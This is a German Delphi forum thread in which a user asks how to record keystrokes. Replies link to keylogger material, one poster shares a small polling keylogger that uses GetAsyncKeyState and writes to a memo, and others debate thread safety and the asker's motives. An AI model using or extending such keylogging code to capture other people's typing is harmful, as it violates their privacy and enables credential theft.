Entwickler-Ecke

Delphi Language (Object-Pascal) / CLX - Tastatur eingaben aufzeichnen?


jackie05 - Sa 23.08.08 00:07
Titel: Tastatur eingaben aufzeichnen?
Hallo,
ich wollte mal versuchen Tastatur eingaben aufzuzeichnen mit Hook Code oder wie man das nennt.

Wie könnte ich das am einfachsten realisieren, das diese dann in einem Memo Feld gespeichert wird?

Ich bedanke mich schonmal für die Hilfe.

MfG


jaenicke - Sa 23.08.08 00:12

Sowas nennt sich Keylogger und wird entsprechend als Virus bzw. gefährliches Programm erkannt. Wie du sowas machst findest du hier:
http://www.delphi-forum.de/viewtopic.php?t=15250


wazup - Sa 23.08.08 06:50

Ich kanns nicht mal entpacken mekert der AntiVir schon rum :lol:


Hidden - Sa 23.08.08 07:19

Richtig so! Wozu brauchst du das überhaupt :?:


Timosch - Sa 23.08.08 14:03

user profile iconwazup hat folgendes geschrieben:
Ich kanns nicht mal entpacken mekert der AntiVir schon rum :lol:

Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben. :mrgreen:


Delete - Sa 23.08.08 14:12

Zitat:
Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben. :mrgreen:

Er hat nur gesagt das AntiVir rummeckert,nicht das er es nicht beheben kann.
Hier gibs ein Tut:http:[url]http://www.assarbad.net/en/stuff/tutorials/hooks/[/url]


Boldar - Sa 23.08.08 14:18

Dass hier ist was simples in der Richtung:

Delphi-Quelltext
1:
2:
3:
4:
5:
6:
7:
8:
9:
10:
11:
12:
13:
14:
15:
16:
17:
procedure keylogger;
var i: integer;
begin
  while true do
  begin
    for i := 10 to 200 do
      if boolean(getasynckeystate(i)) then
        form1.memo1.lines.Text :=
        form1.Memo1.lines.Text + char(i);
    sleep(10);
  end;
end;
procedure TForm1.FormCreate(Sender: TObject);
var tid: cardinal;
begin
  createthread(0,0,@keylogger,nil,0,tid);
end;


Delete - Sa 23.08.08 14:29


Delphi-Quelltext
1:
2:
3:
4:
5:
procedure TForm1.FormCreate(Sender: TObject);
var tid: cardinal;
begin
  createthread(0,0,@keylogger,nil,0,tid);
end;

So ist es besser:

Delphi-Quelltext
1:
2:
3:
4:
5:
Procedure TForm1.FormCreate(Sender: TObject);
var tid:cardinal; Thread:THandle;
begin
  Thread:=BeginThread(nil,0,@Keylogger,nil,0,tid);//So wird der Heap thread-sicher!
end;
:mahn:

:)

mfg,j.klugmann


Boldar - Sa 23.08.08 14:58

Was bringt denn beginthread??
Ich habe davon noch nie was gehört und immer createthread oder Tthread.execute benutzt.


Delete - Sa 23.08.08 15:22

Wie ich bereits sagte,es macht den Heap Thread-Sicher.
Eigentlich kapselt BeginThread CreateThread ,aber es setzt zusätzlich die globale
Variable IsMultiThreaded - :wink:
Ich glaub in Assabards Tut ist es auch so.Naja ich habs mir nie richtig angeguckt. :wink:


Robert.Wachtel - Sa 23.08.08 16:40

user profile iconTimosch hat folgendes geschrieben:
user profile iconwazup hat folgendes geschrieben:
Ich kanns nicht mal entpacken mekert der AntiVir schon rum :lol:

Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben. :mrgreen:

Das tut er doch auch gar nicht...


Hidden - Sa 23.08.08 17:08

user profile iconRobert.Wachtel hat folgendes geschrieben:
user profile iconTimosch hat folgendes geschrieben:
Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben

Das tut er doch auch gar nicht...

Imho doch:
user profile iconjackie05 hat folgendes geschrieben:
Tastatur eingaben aufzuzeichnen


Ich wiederhole mich mal:

user profile iconHidden hat folgendes geschrieben:
Richtig so! Wozu brauchst du das überhaupt :?:


mfG,


Delete - Sa 23.08.08 17:13

Ich glaub nicht das er was Illegales machen will. :roll:


wazup - Sa 23.08.08 17:14

Ich hoff um mich geht es momentan nicht... Ich will nehmlich keinen Programmieren :!:
Falls ich so etwas mache wende ich mich an Freunde um dem "Was willst du damit"-Fragen zu entgehen ^^


Christian S. - Sa 23.08.08 17:15

Ich würde sagen, ihr wartet jetzt erst einmal, was der Fragesteller zu der Sache zu sagen hat. Weitere Postings sind bis dahin nicht sinnvoll. :-)


F34r0fTh3D4rk - Sa 23.08.08 18:09

user profile iconHidden hat folgendes geschrieben:
user profile iconRobert.Wachtel hat folgendes geschrieben:
user profile iconTimosch hat folgendes geschrieben:
Wenn du nicht in der Lage bist, dein Antivirenprogramm zu deaktivieren, solltest du nicht mit dem Gedanken spielen, einen Keylogger zu schreiben

Das tut er doch auch gar nicht...

Imho doch:
user profile iconjackie05 hat folgendes geschrieben:
Tastatur eingaben aufzuzeichnen


user profile iconjackie05 <> user profile iconwazup :!:
um weitere Verwirrungen vorzubeugen ;)


Hidden - Sa 23.08.08 18:29

aso :)

Hab garnicht hingesehen, wen Robert.Wachtel zitiert und gedacht es ginge um den Threadsteller^^